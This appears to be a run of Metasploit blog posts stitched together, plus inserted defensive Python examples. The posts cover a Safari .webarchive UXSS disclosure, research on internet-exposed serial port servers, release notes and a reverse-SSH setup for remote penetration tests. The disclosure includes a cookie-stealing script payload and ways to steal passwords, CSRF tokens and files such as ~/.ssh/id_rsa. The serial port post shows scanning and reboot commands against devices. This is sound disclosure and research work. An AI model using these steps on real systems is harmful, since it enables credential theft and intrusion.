First of all, a big thank you to all of you who participated in our OWASP Top 10 and Web App Scanning webcast last week. (If you missed it, you can view a recording here.) Because of an issue with the webcast platform, I wasn't able to see all of the audience questions while we were online. However, my colleagues were able to recover the unanswered questions, so I created questions and answers for them in the Metasploit discussion forum. Here they are:

 

 

If your question wasn't answered, please feel free to post it as a discussion in the Metasploit section. If you have a confidential question, please email info@rapid7.com.

tldr: For now, don't open .webarchive files, and check the Metasploit module, Apple Safari .webarchive File Format UXSS

 

Safari's webarchive format saves all the resources in a web page - images, scripts, stylesheets - into a single file. A flaw exists in the security model behind webarchives that allows us to execute script in the context of any domain (a Universal Cross-site Scripting bug). In order to exploit this vulnerability, an attacker must somehow deliver the webarchive file to the victim and have the victim manually open it [1] (e.g. through email or a forced download), after ignoring a potential "this content was downloaded from a webpage" warning message [2].

 

It is easy to reproduce this vulnerability on any Safari browser: Simply go to https://browserscan.rapid7.com/ (or any website that uses cookies), and select File -> Save As... and save the webarchive to your ~/Desktop as metasploit.webarchive. Now convert it from a binary plist to an XML document (on OSX):

 

plutil -convert xml1 -o ~/Desktop/metasploit_xml.webarchive ~/Desktop/metasploit.webarchive

 

Open up ~/Desktop/metasploit_xml.webarchive in your favorite text editor. Paste the following line (base64 for <script>alert(document.cookie)</script>) at the top of the first large base64 block.

 

PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Now save the file and double click it from Finder to open in Safari.

You will see your browserscan.rapid7.com cookies in an alert box. Using this same approach, an attacker can send you crafted webarchives that, upon being opened by the user, will send cookies and saved passwords back to the attacker. By modifying the WebResourceURL key, we can write script that executes in the context of any domain, which is why this counts as a UXSS bug.
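Because the damage is done the moment the archive is opened, a defender wants to look inside a received .webarchive first. The following is an added Python example (not code from the original post or the Metasploit module) that parses the webarchive plist with the standard-library plistlib, lists the origin each resource's WebResourceURL claims, and counts inline <script> elements; build_sample_archive and the example.test URLs are constructed for offline testing.

```python
import plistlib
import re
from typing import Any, Dict, List
from urllib.parse import urlparse

# A Safari .webarchive is a property list (binary by default, XML after plutil -convert)
# with a WebMainResource dictionary and a WebSubresources array. Each resource carries
# WebResourceURL (the origin its content runs as once the archive is opened) and
# WebResourceData (the raw bytes, shown as base64 in the XML form). Listing the claimed
# origins and the inline scripts lets an archive be triaged without opening it in Safari.
# Added example; not code from the original post or module.

SCRIPT_RE = re.compile(rb"<script\b", re.IGNORECASE)


def inspect_webarchive(data: bytes) -> Dict[str, Any]:
    """Parse a webarchive (binary or XML plist) and summarise what it claims and carries."""
    plist = plistlib.loads(data)  # plistlib auto-detects binary vs XML
    resources = [plist.get("WebMainResource", {})] + list(plist.get("WebSubresources", []))
    findings: List[Dict[str, Any]] = []
    for res in resources:
        if not res:
            continue
        body = res.get("WebResourceData", b"")
        findings.append({
            "url": res.get("WebResourceURL", ""),
            "mime": res.get("WebResourceMIMEType", ""),
            "inline_scripts": len(SCRIPT_RE.findall(body)),
        })
    # The set of origins whose context this archive's content would execute in.
    origins = {urlparse(f["url"]).netloc for f in findings
               if f["url"].startswith(("http://", "https://"))}
    return {
        "main_url": findings[0]["url"] if findings else "",
        "resources": findings,
        "origins": sorted(origins),
        "has_inline_script": any(f["inline_scripts"] for f in findings),
    }


def build_sample_archive(main_url: str, html: bytes, xml: bool = False) -> bytes:
    """Construct a minimal webarchive for offline testing (constructed sample, not a capture)."""
    archive = {
        "WebMainResource": {
            "WebResourceURL": main_url,
            "WebResourceMIMEType": "text/html",
            "WebResourceTextEncodingName": "UTF-8",
            "WebResourceData": html,
        },
        "WebSubresources": [
            {
                "WebResourceURL": main_url.rstrip("/") + "/app.js",
                "WebResourceMIMEType": "application/javascript",
                "WebResourceData": b"console.log('ok');",
            }
        ],
    }
    fmt = plistlib.FMT_XML if xml else plistlib.FMT_BINARY
    return plistlib.dumps(archive, fmt=fmt)


if __name__ == "__main__":
    # Constructed sample: an archive claiming https://example.test/ with an inline script.
    sample = build_sample_archive(
        "https://example.test/",
        b"<html><body><script>alert(document.cookie)</script>hello</body></html>",
    )
    report = inspect_webarchive(sample)
    print("main resource:", report["main_url"])
    print("origins      :", report["origins"])
    for r in report["resources"]:
        print(f"  {r['url']} ({r['mime']}): {r['inline_scripts']} inline script(s)")
```
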

 

Unfortunately, Apple has labeled this a "wontfix" since the webarchives must be downloaded and manually opened by the client. This is a potentially dangerous decision, since a user expects better security around the confidential details stored in the browser, and since the webarchive format is otherwise quite useful. Also, not fixing this leaves only the browser's file:// URL redirect protection, which has been bypassed many times in the past.

 

Let’s see how we can abuse this vulnerability by attempting to attack browserscan.rapid7.com:

 

Attack Vector #1: Steal the user's cookies. Straightforward. In the context of https://browserscan.rapid7.com/, simply send the attacker back the `document.cookie`. HTTP-only cookies make this attack vector far less useful.

 

Attack Vector #2: Steal CSRF tokens. Force the browser to perform an AJAX fetch of https://browserscan.rapid7.com and send the response header and body back to the attacker.

 

Attack Vector #3: Steal local files. Since .webarchives must be run in the file:// URL scheme, we can fetch the contents of local files by placing AJAX requests to file:// URLs [3]. Unfortunately, the tilde (~) cannot be used in file:// URLs, so unless we know the user’s account name we will not be able to access the user’s home directory. However, this is easy to work around by fetching and parsing a few known system logs [4]; from there, the usernames can be parsed out and the attacker can start stealing known local file paths (like /Users/username/.ssh/id_rsa) and can even "crawl" for sensitive user files by recursively parsing .DS_Store files in predictable locations (OSX only) [5].

 

Attack Vector #4: Steal saved form passwords. Inject a javascript snippet that, when the page is loaded, dynamically creates an iframe to a page on an external domain that contains a form (probably a login form). After waiting a moment for Safari's password autofill to kick in, the script then reads the values of all the input fields in the DOM and sends them back to the attacker [6].

 

Attack Vector #5: Store poisoned javascript in the user's cache. This allows for installing “viruses” like persisted keyloggers on specific sites... VERY BAD! An attacker can store javascript in the user's cache that is run every time the user visits https://browserscan.rapid7.com/ or any other page under browserscan.rapid7.com that references the poisoned javascript. Many popular websites cache their script assets to conserve bandwidth. In a nightmare scenario, the user could be typing emails into a "bugged" webmail, social media, or chat application for years before either 1) he clears his cache, or 2) the cached version in his browser is expired. Other useful assets to poison are CDN-hosted open-source JS libs like google's hosted jquery, since these are used throughout millions of different domains.

 

Want to try for yourself? I've written a Metasploit module that can generate a malicious .webarchive that discreetly carries out all of the above attacks on a user-specified list of URLs. It then runs a listener that prints stolen data on your msfconsole.

 

Unless otherwise noted, all of these vectors are applicable on all versions of Safari on OSX and Windows.

 

Disclosure Timeline

 

Date         Description
2013-02-22   Initial discovery by Joe Vennix, Metasploit Products Developer
2013-02-22   Disclosure to Apple via bugreport.apple.com
2013-03-01   Re-disclosed to Apple via bugreport.apple.com
2013-03-11   Disclosure to CERT/CC
2013-03-15   Response from CERT/CC and Apple on VU#460100
2013-04-25   Public Disclosure and Metasploit module published


Footnotes
  1. Safari only allows webarchives to be opened from file:// URLs; otherwise it will simply download the file.
  2. Alternatively, if the attacker can find a bypass for Safari's file:// URL redirection protection (Webkit prevents scripts or HTTP redirects from navigating the user to file:// URLs from a normal https?:// page), he could redirect the user to a file URL of a .webarchive that is hosted at an absolute location (this can be achieved by forcing the user to mount an anonymous FTP share (osx only), like in our Safari file-policy exploit). Such bypasses are known to exist in Safari up to 6.0.
  3. Unlike Chrome, Safari allows an HTML document served under the file:// protocol to access *any* file available to the user on the hard drive.
  4. file:///var/log/install.log
    file:///var/log/system.log
    file:///var/log/secure.log

  5. file:///Users/username/Documents/.DS_Store
    file:///Users/username/Pictures/.DS_Store
    file:///Users/username/Desktop/.DS_Store

  6. X-Frame-Options can be used to disable loading a page in an iframe, but does not necessarily prevent against UXSS attacks stealing saved passwords. You can always attempt to pop open a new window to render the login page in. If popups are blocked, Flash can be used to trivially bypass the blocker, otherwise you can coerce the user to click a link.

Pull Requests: Want to help?

Metasploit has a first world problem: We get so much code from contributors out in the world, it gets hard to keep up. Most open source projects aren't popular enough to warrant more than three or four contributors, total. Metasploit has over two hundred, last I checked. We're no Rails (those guys have over 2,000 contributors), but for security software, that's not too bad.

 

The problem is, our backlog of outstanding pull requests (PRs) is steadily increasing, and we're now floating about a hundred outstanding pull requests. Since Metasploit is fundamentally a communal effort, I'm hopeful that you generous folks out there in Open Source Land can maybe help us take a bite out of this backlog.

 

First off, check out the new Landing a Pull Request guide. While you might think that this guide is meant only for Rapid7 employees, it's not. The power of GitHub as a source control management system lies in the ability for literally anyone to contribute fixes in a distributed way. Let me quote from the Collaboration between Contributors section:

"If Alice knows a solution to Bob's pull request that Juan pointed out, it is easy for Alice to provide that solution by following [this procedure]. Git blame will still work correctly, commit histories will all be accurate, everyone on the pull request will be notified of Alice's changes, and Juan doesn't have to wait around for Bob to figure out how to use send_request_cgi() or whatever the problem was."

 

What this means is that if you see something languishing in our pull queue, and you think you can help move things along, go for it! Most of the time, PRs don't get landed due to a lack of verification or testing. So, while some old PR might get solved with some bugfixes, more likely, what we really need is some solid verification procedure to prove that the PR actually works. Even better, for non-module PRs, would be some rspec tests added to the outstanding PR. Merely +1'ing a PR isn't likely to be very helpful, but squeaky wheels do get greased. The point is, the opportunities to collaborate on advancing the state of the art in open source security development really are there for the taking.

 

Intern Sought

Speaking of contributing, summer is approaching, and that means it's time to start trolling (trawling?) for interns. We have a pretty formidable job description up, but if you're reading this blog, you probably already have some deep and abiding interest in open source security software, so feel free to pop your resume off to me at todb at metasploit dot com. If you already live here in Austin, then hooray for you, since this internship requires a fair amount of in-person showing up to the office. If you already have contributed code to Metasploit or some other open source project, then you are already way ahead of the game and I would be very interested in talking to you.

 

If interning isn't your thing, but you know an enterprising college student who might be a good fit, give them the shortlink: http://r-7.co/MSF-INTERN.

 

Armitage and MSFGui

Finally, as mentioned in the Metasploit 4.6.0 release notes, we've removed the two alternate Java front ends, Armitage and MSFGui, from Metasploit's main distributions. Those projects, run by Raphael @armitagehacker Mudge and Matthew @scriptjunkie Weeks, respectively, are now being distributed separately from the framework source repository. You can track them at http://www.fastandeasyhacking.com/manual (for Armitage) and http://www.scriptjunkie.us/msfgui/ (for MSFGui). So, if you are sitting on a source checkout of Metasploit and you find that your Java client doesn't work any more, that's probably why. You can get your install back in shape by just fetching from upstream, direct from those guys.

 

New Modules

We've got four new modules this week. We've been busy preparing for conference season, so module throughput has been a little slower than usual.

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Introduction

 

At the InfoSec Southwest 2013 conference I gave a presentation on serial port servers. This presentation was drawn from research that tried to determine how prevalent and exposed internet-connected serial port servers are. The results were pretty scary - authentication was rarely implemented and the types of devices exposed ranged from corporate VPN servers to traffic signal monitors. This post attempts to summarize that presentation, but the deck itself has more details. If you are unfamiliar with serial port servers or looking for some additional background, please consult the FAQ.

 

 

Background

Serial port servers, also known as terminal servers, are designed to allow remote access to the serial port of another device over TCP/IP.

These devices serve three primary functions:

  • Provide remote access to non-networked equipment such as environment controls, industrial automation, and monitoring systems.
  • Provide remote access, location tracking, and monitoring of physically mobile systems, including vehicles and cargo containers.
  • Provide out-of-band access to network and power equipment for the purpose of recovery in the case of an outage.

 

A typical serial port server is a box the size of a home router with one or more serial ports on one side and an ethernet, wireless, or mobile interface on the other. The serial port is connected to a target device, such as a router, server, or industrial control system, and the serial port server is configured to allow remote access to this port. Some examples of serial port servers are shown below.

 


Authentication

 

There are three common ways for a user to access a remote serial port:

  1. They login via telnet, ssh, or the web interface and directly type commands on the serial device.
  2. They connect to a specific TCP port that acts as a proxy for the serial port, allowing immediate access to the serial device.
  3. They configure vendor-specific software to access the serial port over a proprietary protocol.

 

In the first case, the serial port server requires some form of authentication before the user can interact with the serial-connected device. The most secure method is over an SSH session, but unless the attacker can eavesdrop on your connection, even telnet will do in a pinch.

 

In the second case, this is typically a clear-text TCP connection, accessed using the telnet command, and without any imposed authentication by the serial port server. If the serial-connected device requires authentication to access the serial console, this is the only layer of defense. The third case is usually identical, however some protocols (RealPort) can be configured to use both encryption and shared key authentication. In practice, however, these are mostly clear-text and unauthenticated as well.

 

In summary, we have a serial port exposed directly to the network. If the serial port is connected to a device that requires authentication, such as a Linux server, or a Cisco IOS router, it is theoretically protected from unauthorized access unless the attacker knows the correct password. Many serial devices do not require authentication and instead assume that if you are physically connected to a serial port, you probably have the right to configure the system.

 

 

Serial port servers change the authentication model in two significant ways. First, the concept of trusting a physical port goes out the window when that port is exposed to the internet, especially without an initial layer of authentication. Second, there is a significant difference between an SSH or telnet session and an authenticated serial console. If the user disconnects from SSH or telnet, the session is closed. This is not the case with serial consoles unless the device automatically logs out due to inactivity. Very few systems support inactivity timers on serial consoles (Cisco is one of the exceptions). An attacker just has to wait for a valid user to authenticate. Once the user is logged in, the attacker can either hijack the serial port connection or wait for the user to become idle and then steal a pre-authenticated shell on the target device.

 

The end result is that both the TCP proxy and proprietary access protocols lead to a situation where most of the serial ports they expose require no authentication for an attacker to access. An analysis of internet-exposed serial port servers uncovered over 13,000 root shells, system consoles, and administrative interfaces that did not require authentication, many of which had been pre-authenticated by a valid user.

 

An example of a serial port connected to a pre-authenticated root shell is shown below.

 

$ telnet 1.2.3.4 2001
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.

# uname -v
FreeBSD 7.3-STABLE #0

# uptime
3:48AM  up 701 days, 13:22, 1 user, load averages: 0.00, 0.00, 0.00

 

 

 

Internet Exposure

 

Over 114,000 unique IPs were identified as either Digi International or Lantronix serial port servers using the Simple Network Management Protocol (SNMP) with the community "public". Over 95,000 of these systems were exposed to the internet through mobile connections such as GPRS, EDGE, and 3G. Another 14,000 unique IPs were identified running Digi or Digi-based devices using Digi's proprietary Advanced Device Discovery Protocol (ADDP). FTP banners were used to identify another 8,000 Digi devices. Another 500 Lantronix systems were identified using their telnet banners. Web server headers, SSL certificates, and telnet prompts were useful, but generally not conclusive on their own to identify serial port servers.

 

Three sets of data were used to identify open serial consoles. First, the Internet Census 2012 data was analyzed for TCP ports 2001-2010 and 3001-3010. These ports are commonly used by Digi and Lantronix devices as TCP proxies for the first 10 configured serial ports. Second, the raw responses for port 771 were analyzed to detect instances of the RealPort proprietary service used by Digi serial port servers. Finally, the devices running the RealPort service were queried to obtain the banners from each attached serial port. The final result was a set of banners that could be matched against common serial console and device menu fingerprints. Overall, a little over 13,000 unique serial ports were exposed that offered some form of system shell, console, data feed, or administrative menu.

 

 

 

Metasploit Modules

 

A handful of Metasploit modules have been written to identify and assess serial port servers made by Digi International. To use these modules, first download Metasploit, and access the Metasploit Console or the modules tab of the Metasploit web interface.

 

ADDP Discovery: auxiliary/scanner/scada/digi_addp_version


The digi_addp_version module can be used to identify Digi and Digi-based devices that have the ADDP service enabled.

 

$ msfconsole
msf > use auxiliary/scanner/scada/digi_addp_version
msf auxiliary(digi_addp_version) > set RHOSTS 192.168.0.60
msf auxiliary(digi_addp_version) > run
[*] Finding ADDP nodes within 192.168.0.60->192.168.0.60 (1 hosts)
[*] 192.168.0.60:2362 ADDP hwname:Digi Connect WAN Edge10 hwrev:0 fwrev:Version 82001160_J1 01/04/2007 mac:00:40:9D:2E:AD:B2 ip:192.168.0.60 mask:255.255.255.0 gw:192.168.0.1 dns:0.0.0.0 dhcp:false ports:1 realport:771 realport_enc:false magic:DIGI


 

ADDP Reboot: auxiliary/scanner/scada/digi_addp_reboot


The digi_addp_reboot module can be used to reboot Digi devices that have the ADDP service enabled. In contrast to the version module, you may need to set the ADDP_PASSWORD variable to the "root" password if the default of dbps is not configured. Keep in mind that many devices that are based on the Digi platform do not let the user configure or disable the ADDP service at all. In addition to rebooting the device, ADDP can be used to change the IP configuration, including the DNS server, which can lead to some particularly nasty attacks when the Digi device is used as a router.

 

$ msfconsole
msf > use auxiliary/scanner/scada/digi_addp_reboot
msf auxiliary(digi_addp_reboot) > set RHOSTS 192.168.0.60
msf auxiliary(digi_addp_reboot) > run

 

RealPort Discovery: auxiliary/scanner/scada/digi_realport_version


The digi_realport_version module can be used to identify Digi and Digi-based devices that use the RealPort protocol to expose serial ports. The module will identify the platform in use and indicate how many physical serial ports are present on the device.

 

$ msfconsole
msf > use auxiliary/scanner/scada/digi_realport_version
msf auxiliary(digi_realport_version) > set RHOSTS 192.168.0.60
msf auxiliary(digi_realport_version) > run
[*] 192.168.0.60:771 Digi Connect WAN ( ports: 1 )

 

 

RealPort Serial Port Scan: auxiliary/scanner/scada/digi_realport_serialport_scan


The digi_realport_serialport_scan module will attempt to retrieve a banner from each configured serial port at various baud rates. Keep in mind that the RealPort TCP service does not have to live on port 771, so portscan the device and use the ADDP modules to identify the realport service. The example below identifies a Linux root shell present on serial port 1.

 

$ msfconsole
msf > use auxiliary/scanner/scada/digi_realport_serialport_scan
msf auxiliary(digi_realport_serialport_scan) > set RHOSTS 192.168.0.60
msf auxiliary(digi_realport_serialport_scan) > run
[*] 192.168.0.60:771 [port 1 @ 9600bps] "[root@localhost root] # \r\n"
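The research matched retrieved banners against console and menu fingerprints to tell a pre-authenticated shell from a login prompt. Here is an added Python example (not from the original post or the Metasploit module) that parses lines in the scanner's output format shown above and classifies each banner so an audit of your own address space can rank what is exposed; the fingerprint list is a small illustrative set, and the SAMPLE_OUTPUT hosts and banners are constructed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Banners pulled from exposed serial ports (the kind of line the
# digi_realport_serialport_scan module prints) are matched against a small set
# of console fingerprints so that pre-authenticated shells, privileged router
# prompts, login prompts and menus can be told apart and ranked.
# Added example; the fingerprint list is illustrative, not the research's full set.


@dataclass
class Finding:
    host: str
    serial_port: int
    baud: int
    banner: str
    category: str   # root_shell, cisco_exec, cisco_user_exec, user_shell, login_prompt, menu, unknown
    severity: str   # critical, high, medium, info


# (regex applied to the last non-empty banner line, category, severity); first match wins.
FINGERPRINTS: List[Tuple[str, str, str]] = [
    (r"\[root@[^\]]*\]\s*#\s*$|^root@\S+:\S*#\s*$|^#\s*$", "root_shell", "critical"),
    (r"^\S+#\s*$", "cisco_exec", "critical"),          # privileged exec prompt, e.g. Router#
    (r"^\S+>\s*$", "cisco_user_exec", "high"),         # user exec prompt, e.g. Router>
    (r"\$\s*$", "user_shell", "high"),                 # unprivileged Unix shell
    (r"(?i)(login|username|password)\s*:\s*$", "login_prompt", "info"),
    (r"(?i)(main menu|select an option|press .* to continue)", "menu", "high"),
]

# Scanner output format from the page:
# [*] 192.168.0.60:771 [port 1 @ 9600bps] "[root@localhost root] # \r\n"
SCAN_LINE_RE = re.compile(
    r'^\[\*\]\s+(?P<host>[\d.]+):(?P<tcp>\d+)\s+'
    r'\[port\s+(?P<serial>\d+)\s+@\s+(?P<baud>\d+)bps\]\s+"(?P<banner>.*)"\s*$'
)


def classify_banner(banner: str) -> Tuple[str, str]:
    """Return (category, severity) for a banner as printed by the scanner (escaped \\r\\n)."""
    # The scanner prints line endings as the two characters '\' 'r'; turn them back into real ones.
    text = banner.encode("latin-1", "replace").decode("unicode_escape")
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    last = lines[-1] if lines else ""   # the prompt is normally the last non-empty line
    for pattern, category, severity in FINGERPRINTS:
        if re.search(pattern, last):
            return category, severity
    return "unknown", "medium"


def parse_scan_output(output: str) -> List[Finding]:
    """Turn scanner output lines into classified findings; lines in another format are skipped."""
    findings: List[Finding] = []
    for line in output.splitlines():
        m = SCAN_LINE_RE.match(line.strip())
        if not m:
            continue
        category, severity = classify_banner(m["banner"])
        findings.append(Finding(m["host"], int(m["serial"]), int(m["baud"]),
                                m["banner"], category, severity))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per severity for a quick view of how bad the exposure is."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed sample output (private addresses and made-up banners, not real captures).
SAMPLE_OUTPUT = """\
[*] 192.168.0.60:771 [port 1 @ 9600bps] "[root@localhost root] # \\r\\n"
[*] 192.168.0.61:771 [port 1 @ 9600bps] "\\r\\nlogin: "
[*] 192.168.0.62:771 [port 2 @ 115200bps] "\\r\\nRouter>"
[*] 192.168.0.63:771 [port 1 @ 9600bps] "\\r\\nRouter#"
[*] Scanned 4 of 4 hosts (100% complete)
"""

if __name__ == "__main__":
    results = parse_scan_output(SAMPLE_OUTPUT)
    for f in results:
        print(f"{f.host} serial port {f.serial_port} @ {f.baud}bps: {f.category} ({f.severity})")
    print(summarize(results))
```
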

 

 

Not Serial

 

Serial port servers were the focus of this research, but as the project progressed it became clear that many of these devices are also used to manage other types of connections. For example, security systems may be connected via Digi WAN devices, but instead of using a serial port, the Digi device is monitoring signals on GPIO pins. In the case of smart grid power meters, the Digi device was using Zigbee to communicate with the meters, and streaming the data back over MODBUS.  Even though the primary use case is often serial port access, these devices are used to connect, translate, and proxy much more than that.

 

 

Remediation

 

The biggest challenge right now is awareness. Few organizations are aware that their equipment can be accessed through serial ports connected through mobile networks. In some cases, the organization may assume that their specific mobile configuration prevents access from the internet, when that may not be the case. The wide use of mobile connections makes detection and response much more difficult. There are some basic steps that can significantly reduce the risk of an attack through an exposed serial port server.

 

  • Only use encrypted management services (SSL/SSH)
  • Set a strong password and non-default username
  • Scan for and disable ADDP wherever you find it
  • Require authentication to access serial ports
    • Enable RealPort authentication and encryption for Digi
    • Use SSH instead of telnet & direct-mapped ports
  • Enable inactivity timeouts for serial consoles
  • Enable remote event logging
  • Audit uploaded scripts

 

 

Conclusion

 

There are over 114,000 serial port servers accessible from the internet, with over 95,000 connected via mobile providers. These expose over 13,000 serial ports that offer some level of administrative access to any attacker that happens to connect. There is little awareness of how exposed these devices are and no real push by either users or vendors to improve the situation. A list of vulnerable organizations can be pulled from public sources such as SHODAN and the Internet Census 2012 data set. The sheer number of critical, bizarre, and just plain scary devices connected to the internet through serial port servers is an indication of just how dangerous the internet has become.

Java Payload Cleanup

If you've been watching the Metasploit source repository, you will have noticed some movement in Java Payload land -- specifically, PR#1217, which landed this week. Thanks to the refactoring efforts of Michael @mihi42 Schriel, testing by @Meatballs, and integration from James @egyp7 Lee, the Javapayload and Java Meterpreter projects can now more easily be hacked at with Eclipse, a preferred IDE for Java nerds. There's also a slew of new unit tests, so you have more assurance that your hackery won't break existing functionality. This is good news for you if you are a) more of a Java guy than a Ruby guy, and b) you want to make meaningful contributions to the Metasploit framework. Thanks a ton, guys!

 

ZDI Sport Fishing

This week also sees a trio of ZDI-derived Metasploit modules -- we have exploits now for ZDI-13-051, ZDI-13-052, and ZDI-13-053. They all target the HP Intelligent Management Center (IMC), and all three were initially reported to the Zero Day Initiative (ZDI). ZDI, if you weren't aware, is now part of HP's new HP Security Research (HPSR) group. Yes, that's a lot of acronyms.

 

ZDI-disclosed vulnerabilities are especially attractive for some exploit developers, including our own Juan Vazquez. By dint of being disclosed by ZDI, we know for sure that some money has already changed hands. This makes them de-facto "high value" vulnerabilities, and not just goofy crashes or exposed in unlikely, contrived attack scenarios. In addition, we know that there are organizations out there who put a premium on protecting against ZDI vulns. Those folks like to be able to use Metasploit modules to test the efficacy of their defenses, both pre- and post-patch.

 

This is all incidental to the fact that ZDI vulns are generally rewarding to research. It's like fishing in a pond that you know is stocked; it's a lot easier to be confident and be successful when you know for sure that there is an exploit worth catching there. If you're looking to get involved with exploit development on targets that aren't just toys or CTF targets, ZDI can provide a pretty rich target landscape.

 

New Modules

Besides HP IMC, we of course have a passel of new modules. Passel?  How about a clutch? No, a murder. Of course. Below is this week's murder of Metasploit modules.

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

An internal penetration test simulates an attack on the network from inside the network. It typically simulates a rogue employee with user-level credentials or a person with physical access to the network, such as cleaning staff, trying to access resources on the network they're not authorized for.

 

Internal penetration tests typically require the auditor to be physically present in the location. If you are working as a consultant, then conducting internal penetration tests can mean a lot of travel. Unless the networks you have to audit are in prime vacation spots, this can be a drag, and it's expensive because it reduces billable time and incurs higher T&Es for your customer.


Here's an approach on how you can eliminate the need to travel and still get the same work done. One advantage of this approach is that it does not require you to ship an appliance or device to the customer that must later be returned. Also, this doesn't only work for consulting shops but also for large companies with internal penetration testers who need to audit several sites.

 

Set up SSH server on the Internet

 

In this example, we set up an Ubuntu server hosted in the cloud. However, you could do this with any server that has an internet-facing IP address. In this example, the server has the address 192.0.2.1 and you will be auditing from 198.51.100.0/24. Here's what you do next:


  • Install the SSH server on the machine using sudo apt-get install openssh-server
  • Set up a new account for user tunneluser with the command sudo adduser tunneluser
  • Set up an SSH account for user tunneluser
  • Open the file /etc/ssh/sshd_config and append the line GatewayPorts yes
  • Configure the server to accept SSH from anywhere but port 3790 only from your own network. The default INPUT policy is set to DROP with -P, and rules are then added that allow loopback traffic, replies to the server's own outbound connections (otherwise apt-get and the like stop working), SSH, and port 3790 from 198.51.100.0/24:

  iptables -P INPUT DROP

  iptables -A INPUT -i lo -j ACCEPT

  iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

  iptables -A INPUT -p tcp --dport ssh -j ACCEPT

  iptables -A INPUT -p tcp --dport 3790 --source 198.51.100.0/24 -j ACCEPT

 

 

Create a virtual machine running Metasploit Pro

 

Next, you need to set up the virtual machine you'll make available to your customer.

 

  • Create a virtual machine running Ubuntu 12.04
  • Generate an SSH key for tunneluser with ssh-keygen
  • Copy the resulting public key file (~/.ssh/id_rsa.pub) to /home/tunneluser/.ssh/authorized_keys on the Ubuntu machine created in the previous section. Prepend no-pty,command="/bin/false" to the key. This will ensure that someone who grabs the key from your VM will not be able to take control of the tunnel server. Both steps here can be performed with a single command:

  (echo -n 'no-pty,command="/bin/false" '; cat id_rsa.pub) >> ~/.ssh/authorized_keys

  • Ensure that the network adapter is set to bridged (payloads won't be able to connect back if the machine is NATed)
  • Download the latest version of Metasploit from www.rapid7.com
  • Install Metasploit on the machine
  • Create your Metasploit user name and password on the machine
  • Activate your Metasploit Pro license (if you don't have a license, sign up for the 7-day trial)
  • Create a start-up script that contains only the following line: ssh -n -N -R3790:localhost:3790 tunneluser@192.0.2.1 (the -N flag requests port forwarding only, with no remote command; without it the forced command /bin/false on the server runs, exits immediately, and takes the tunnel down with it)
  • Shut down the virtual machine
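The whole design rests on the tunnel server's copy of the key being restricted, so it is worth checking that invariant rather than assuming it. Here is an added Python example (not from the original post) that audits an authorized_keys file for the no-pty and command="/bin/false" options the steps above prepend, and also reports the optional no-agent-forwarding and no-X11-forwarding options; the SAMPLE_AUTHORIZED_KEYS contents and key blobs are constructed placeholders.

```python
from typing import Dict, List

# The tunnel design depends on tunneluser's key on the tunnel server carrying
# no-pty and command="/bin/false", so that someone who lifts the key from the VM
# can open a reverse tunnel and nothing more. This audits an authorized_keys file
# for that invariant. Added example, not code from the original post.

REQUIRED_OPTIONS = {"no-pty", 'command="/bin/false"'}
# Not required by the procedure above, but they close two more doors a stolen key could open.
RECOMMENDED_OPTIONS = {"no-agent-forwarding", "no-X11-forwarding"}
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def _split(text: str, on_space: bool) -> List[str]:
    """Split on whitespace (or commas) outside double quotes; quotes stay in the tokens.

    Good enough for option lists such as from="198.51.100.0/24",command="/bin/false";
    backslash-escaped quotes inside values are not handled.
    """
    out: List[str] = []
    cur: List[str] = []
    quoted = False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        is_sep = ch.isspace() if on_space else ch == ","
        if is_sep and not quoted:
            if cur:
                out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur:
        out.append("".join(cur))
    return out


def audit_authorized_keys(text: str) -> List[Dict[str, object]]:
    """Return one record per key line: key type, missing options and an overall ok flag."""
    results: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = _split(line, on_space=True)
        if fields[0] in KEY_TYPES:                 # no options field on this line
            options: List[str] = []
            key_type = fields[0]
        else:                                      # options field precedes the key type
            options = _split(fields[0], on_space=False)
            key_type = fields[1] if len(fields) > 1 else ""
        present = set(options)
        results.append({
            "line": lineno,
            "key_type": key_type,
            "missing_required": sorted(REQUIRED_OPTIONS - present),
            "missing_recommended": sorted(RECOMMENDED_OPTIONS - present),
            "ok": REQUIRED_OPTIONS <= present,
        })
    return results


# Constructed sample; the key blobs are placeholders, not real keys.
SAMPLE_AUTHORIZED_KEYS = """\
# tunneluser keys (constructed sample)
no-pty,command="/bin/false" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC0placeholder tunneluser@vm
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHdplaceholder leftover@laptop
from="198.51.100.0/24",command="/bin/false" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1placeholder partial@vm
"""

if __name__ == "__main__":
    for rec in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        state = "ok" if rec["ok"] else "UNRESTRICTED: missing " + ", ".join(rec["missing_required"])
        print(f"line {rec['line']} ({rec['key_type']}): {state}")
```
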

 

Have your client run the virtual machine in their network

 

Next, you'll have to ask your client to run the virtual machine on their network.

 

  • Zip the virtual machine and make it available to your client as a download (or FedEx a DVD)
  • Have the client boot the virtual machine on their network, where it gets a local IP address through DHCP
